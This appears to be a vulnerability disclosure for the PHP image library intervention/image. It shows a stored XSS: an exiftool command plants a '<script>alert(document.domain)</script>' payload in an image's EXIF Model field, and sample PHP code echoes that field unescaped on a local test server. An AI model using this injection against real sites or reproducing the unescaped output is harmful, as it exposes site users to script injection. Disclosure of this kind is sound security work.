intervention/image is an image handling and manipulation library. This package is vulnerable to XSS via reading the exif data from image.
1. Download exiftool using this tool(https://exiftool.org/) 2. Install it(https://exiftool.org/install.html) 3. Modify the image to add 'Model' key then value '<script>alert(document.domain)</script>' 4. Open terminal -> change directory to where the image is located 5. run this command 'exiftool -Model="<script>alert(document.domain)</script>" imagefilename.jpg' 6. Move it in your project root dir
require 'vendor/autoload.php'; // import the Intervention Image Manager Class use Intervention\Image\ImageManagerStatic as Image; $filename = "./imagefilename.jpeg"; // read all existing data into an array $data = Image::make($filename)->exif(); // read model of the camera $name = Image::make($filename)->exif('Model'); echo $name;
php -S 127.0.0.1:8080
http://127.0.0.1:8080/page.phpto trigger the XSS payload